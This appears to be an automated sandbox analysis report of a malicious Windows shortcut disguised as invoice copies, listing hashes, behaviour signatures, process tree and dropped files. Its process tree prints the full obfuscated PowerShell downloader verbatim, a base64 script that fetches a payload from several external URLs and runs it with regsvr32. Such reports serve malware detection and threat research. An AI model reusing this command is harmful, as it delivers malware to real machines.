Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20/11/2024, 02:44

General

  • Target

    79b3929c39c12f6ffc55c5423e22185da7016cffdb4b53dd94fcd9caa00f0fd4.lnk

  • Size

    2KB

  • MD5

    e3d071f439e540c370a1251cb1286fac

  • SHA1

    6a511348a2c3c806c76992b686c41c4448b63cdf

  • SHA256

    79b3929c39c12f6ffc55c5423e22185da7016cffdb4b53dd94fcd9caa00f0fd4

  • SHA512

    7e5ad3acd450a5252e99689cdc611d250b31244149b96b3bc02f5636f4b1fc0c03b5b21082930f42101b7d18a6e28cf459e93610a7fabdf4ee0dde63a6375e6a

Score
6/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\79b3929c39c12f6ffc55c5423e22185da7016cffdb4b53dd94fcd9caa00f0fd4.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2336
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "Invoice Copies 2022-04-26_1648, United States.doc.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2htZW5nLmNvLnVrL2NnaS1iaW4vSC8iLCJodHRwczovL2Vkb3Jhc2VndXJvcy5jb20uYnIvY2dpLWJpbi9taDNNTUdLZmhYdEovIiwiaHR0cHM6Ly93d3cucmVuZWV0dGVuLm5sL01lbnUvWE5NaHg2blNubnBwOGFaemsvIiwiaHR0cDovL2JyZW5kYW5jbGVhcnkubmV0L2ltYWdlcy9vSUxFSnhPYjAyMU9naEdkeHMvIiwiaHR0cHM6Ly9iZW5jZXZlbmRlZ2hhei5odS93cC1pbmNsdWRlcy9pVVd2VU5xLyIsImh0dHA6Ly9hbmF0LWJhci5jby5pbC93cC1hZG1pbi9ENkxpczVDdHJNZHVyTS8iKTtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZW52OlRFTVAvd1p4cGNHaHFQeC5lcVo7UmVnc3ZyMzIuZXhlICRlbnY6VEVNUC93WnhwY0docVB4LmVxWjticmVha30gY2F0Y2ggeyB9fQ==')) > "C:\Users\Admin\AppData\Local\Temp\hgUQRrLvVK.ps1"; powershell -executionpolicy bypass -file "$env:TEMP/\hgUQRrLvVK.ps1"; Remove-Item "$env:TEMP/\hgUQRrLvVK.ps1" -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2768
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\Admin\AppData\Local\Temp/\hgUQRrLvVK.ps1
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2904

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\hgUQRrLvVK.ps1

    Filesize

    926B

    MD5

    8ef6909ba4b9e6cd6676297601c39e5c

    SHA1

    9dcd9af682adacb278c1970d49babafd29df3928

    SHA256

    9a9ba2e8478d73ec02ff4c0d2c30dc0e7fad0e54d16737875c2b60fcbcac727c

    SHA512

    b8f40c8d659c82034984d703ea1a6cf4cbcdb3039bf917e2d9eba391f910af860c1e154ebe1b1004532b0412fa5c39db554a54f7c1bb1ec32c0bfcf4eb6900b5

  • memory/2768-38-0x000007FEF681E000-0x000007FEF681F000-memory.dmp

    Filesize

    4KB

  • memory/2768-39-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

    Filesize

    2.9MB

  • memory/2768-41-0x000007FEF6560000-0x000007FEF6EFD000-memory.dmp

    Filesize

    9.6MB

  • memory/2768-40-0x0000000001D80000-0x0000000001D88000-memory.dmp

    Filesize

    32KB

  • memory/2768-42-0x000007FEF6560000-0x000007FEF6EFD000-memory.dmp

    Filesize

    9.6MB

  • memory/2768-43-0x000007FEF6560000-0x000007FEF6EFD000-memory.dmp

    Filesize

    9.6MB

  • memory/2768-44-0x000007FEF6560000-0x000007FEF6EFD000-memory.dmp

    Filesize

    9.6MB

  • memory/2768-45-0x000007FEF6560000-0x000007FEF6EFD000-memory.dmp

    Filesize

    9.6MB

  • memory/2768-51-0x000007FEF6560000-0x000007FEF6EFD000-memory.dmp

    Filesize

    9.6MB

  • memory/2768-53-0x000007FEF6560000-0x000007FEF6EFD000-memory.dmp

    Filesize

    9.6MB